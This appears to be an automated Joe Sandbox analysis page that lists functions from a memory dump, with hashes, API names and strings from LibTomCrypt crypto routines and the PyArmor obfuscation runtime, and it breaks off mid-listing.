                                                                                                                                                                                                                              • String ID: prng != NULL$src/misc/crypt/crypt_register_prng.c
                                                                                                                                                                                                                              • API String ID: 1475443563-58737364
                                                                                                                                                                                                                              • Opcode ID: 5db479b9f580a5123bff136322f571e108f7957038b84ec62aab3c7d3d2925cd
                                                                                                                                                                                                                              • Instruction ID: b9b403c2e0f99732386e2947564b3fe97af0e39cc9b2938e0a113a8fd4b54c8e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5db479b9f580a5123bff136322f571e108f7957038b84ec62aab3c7d3d2925cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7151BD33300A848AE710CB52EA84B9E7768FB88BD5F414129DF5A8B755EB38E649C711
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A2CC20 Relevance: 15.1, APIs: 8, Strings: 2, Instructions: 108stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strcmp
                                                                                                                                                                                                                              • String ID: name != NULL$src/misc/crypt/crypt_find_prng.c
                                                                                                                                                                                                                              • API String ID: 1004003707-2030105502
                                                                                                                                                                                                                              • Opcode ID: 26d8f701c46f9d1c1b4a8e2129589061ea7df5d517e5c7b6c2f438aac69c6557
                                                                                                                                                                                                                              • Instruction ID: 4b4ac9e87b613dd7fc9cbdd67db2e360e107c627fe6389121a55d0fcb707ce64
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26d8f701c46f9d1c1b4a8e2129589061ea7df5d517e5c7b6c2f438aac69c6557
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2831C46130664649EF15DA62F7D13BD6361EF89BC6F408538DE0B8B94CDB18E50AC710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A2C980 Relevance: 15.1, APIs: 8, Strings: 2, Instructions: 99stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • src/misc/crypt/crypt_find_cipher.c, xrefs: 70A2CAB1
                                                                                                                                                                                                                              • name != NULL, xrefs: 70A2CAB8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strcmp
                                                                                                                                                                                                                              • String ID: name != NULL$src/misc/crypt/crypt_find_cipher.c
                                                                                                                                                                                                                              • API String ID: 1004003707-679692990
                                                                                                                                                                                                                              • Opcode ID: 46dff963bd50bf06637651a5080ef821cf1c95f91b4ec6c23707cb6dad0b0c4c
                                                                                                                                                                                                                              • Instruction ID: 47d855f9a82c05a08c5b7709e5c0db0a36e425369cda954785274828ee7d5fc9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46dff963bd50bf06637651a5080ef821cf1c95f91b4ec6c23707cb6dad0b0c4c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C31972131258A89EF19DA52BBD17BD6372EFC8BC5F009138DE0B8B94CDB18D509C354
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A3C1D0 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 168COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                              • String ID: mask != NULL$seed != NULL$src/pk/pkcs1/pkcs_1_mgf1.c
                                                                                                                                                                                                                              • API String ID: 2803490479-2931318352
                                                                                                                                                                                                                              • Opcode ID: 6b9b2638847385741f04240b9f25a33b50d8f81af69a7f93ade6a6a8e05e9353
                                                                                                                                                                                                                              • Instruction ID: ef0ee707f38020b591301bd521af8c381c4568011fb4b9a4e892be58d9272c00
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b9b2638847385741f04240b9f25a33b50d8f81af69a7f93ade6a6a8e05e9353
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA5102727182948AEB12CF31AD1476EFB61AB49BC4F85C119DE478BB0DEB39E915C700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A07830 Relevance: 12.5, APIs: 3, Strings: 5, Instructions: 465COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • obfmode.c, xrefs: 70A07F20
                                                                                                                                                                                                                              • lambda_, xrefs: 70A07906
                                                                                                                                                                                                                              • The function '%s' could not be obufscated with advanced mode 2, insert one redundant line '[None, None]' at the beginning of this function to fix it, xrefs: 70A07D9A
                                                                                                                                                                                                                              • code, xrefs: 70A07F27
                                                                                                                                                                                                                              • <lambda>, xrefs: 70A078E3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID: <lambda>$The function '%s' could not be obufscated with advanced mode 2, insert one redundant line '[None, None]' at the beginning of this function to fix it$code$lambda_$obfmode.c
                                                                                                                                                                                                                              • API String ID: 3510742995-709486575
                                                                                                                                                                                                                              • Opcode ID: 9c206fb7e3df2caa62945627874448028de500601b2c346af270736ad6d9c6fc
                                                                                                                                                                                                                              • Instruction ID: e5f83357507273fe626c2378f0ef9684e6aa0a620002af39cfc0946a27191181
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c206fb7e3df2caa62945627874448028de500601b2c346af270736ad6d9c6fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0912B072A19A84C6DB11CB25F94036E77A1F789BC0F148626EE4E47B6CEB3CD945CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A300F0 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 196COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: in != NULL$key != NULL$out != NULL$outlen != NULL$src/pk/rsa/rsa_sign_hash.c
                                                                                                                                                                                                                              • API String ID: 0-3034240082
                                                                                                                                                                                                                              • Opcode ID: 33f1c6733adf6b73dd1bcaacf3c916663a49fa0af9fc9f5bd53413d5ca286772
                                                                                                                                                                                                                              • Instruction ID: 43aa812b5e6d62426aa7820072cefefa95c3ee1920842055645855421a484405
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33f1c6733adf6b73dd1bcaacf3c916663a49fa0af9fc9f5bd53413d5ca286772
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94814A726086C48AD760CF12F594B9EB7A4F388788F804525EE8A97B5CDB7DD584CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A03940 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 75COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: sprintf$malloc
                                                                                                                                                                                                                              • String ID: %s%s$', %d)$(__name__, __file__, b'$\x%02x$__pyarmor__
                                                                                                                                                                                                                              • API String ID: 1197820334-965320081
                                                                                                                                                                                                                              • Opcode ID: c369251fb0a55e441b6b7b6082bc99608795113d5040f8d234c7d9c4f270ff51
                                                                                                                                                                                                                              • Instruction ID: 13a22fed89ed5e13b10e00b9360989aada683de68b49fb6bf2503d11b5efdca9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c369251fb0a55e441b6b7b6082bc99608795113d5040f8d234c7d9c4f270ff51
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5210527B6161AA6DF04CB16EE0079C6755FB49BD8F948621DE4E57328EA3CF84BC300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A94A70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 156COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Address %p has no image-section, xrefs: 70A94C59
                                                                                                                                                                                                                              • VirtualQuery failed for %d bytes at address %p, xrefs: 70A94C48
                                                                                                                                                                                                                              • VirtualProtect failed with code 0x%x, xrefs: 70A94BFA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: QueryVirtual
                                                                                                                                                                                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                                                                                                              • API String ID: 1804819252-2123141913
                                                                                                                                                                                                                              • Opcode ID: 733d51a1427d0a32b1ba22bfa9b8bb9947ff5582aeba3c72c43ff394f46c19c6
                                                                                                                                                                                                                              • Instruction ID: e4c2a032ba07a70ad55a331a289dd10679c441600fc4ad0118aee984801860af
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 733d51a1427d0a32b1ba22bfa9b8bb9947ff5582aeba3c72c43ff394f46c19c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A51C172721B40CADB118F26E841B5D77E1BB88BA4F448225EE1E477A8DB7CD641C308
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A95E60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _stat64$freemallocstrlen
                                                                                                                                                                                                                              • String ID: <unknown>
                                                                                                                                                                                                                              • API String ID: 2817875163-1574992787
                                                                                                                                                                                                                              • Opcode ID: 6a3d09fc4f553521e5bab0497db59d5b568486512b77256a5121d68ef6b63300
                                                                                                                                                                                                                              • Instruction ID: 669c8bf0a762f56e94194a32f0f51620e3751b4fd1e4c852faac71b9d415f3b4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a3d09fc4f553521e5bab0497db59d5b568486512b77256a5121d68ef6b63300
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C451F33232975088DB118F31E08272E77F6EB4EB94F548116EA860734CE73EC949C749
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A083D0 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: <lambda>$co_names$code$lambda_$obfmode.c
                                                                                                                                                                                                                              • API String ID: 0-2864150894
                                                                                                                                                                                                                              • Opcode ID: 05004206ab705e3755d0e13632dfdba8528890e8fc75ed524befcf21d1d81899
                                                                                                                                                                                                                              • Instruction ID: 8b74b40a27b18a611b9d8725a9bc73730baa9db69e773ff1e821c50b8aa0ac27
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05004206ab705e3755d0e13632dfdba8528890e8fc75ed524befcf21d1d81899
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16B1CB32A19B88C6EB118B25FD4436E77A0F799BC4F444625DE8E17728EB3CE644C704
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A0E8F0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 220COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: Internal buffer error$This function could not be called from the plain script$code$obfmode.c
                                                                                                                                                                                                                              • API String ID: 0-1583419685
                                                                                                                                                                                                                              • Opcode ID: 43ea46ccba0a62c22e3122f77d5a459aedc9d054b90c690be6e56d65fd4efa44
                                                                                                                                                                                                                              • Instruction ID: 3b6b0bade56fdd6440adbf23238103ee0107893c8bc2f5ff94c4e24e0c6abe79
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43ea46ccba0a62c22e3122f77d5a459aedc9d054b90c690be6e56d65fd4efa44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AA15B7271AA48C5EB01CF15FD8036973A0F7A9B89F508A26DA5E47728EF3CD685D300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A22810 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 109stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
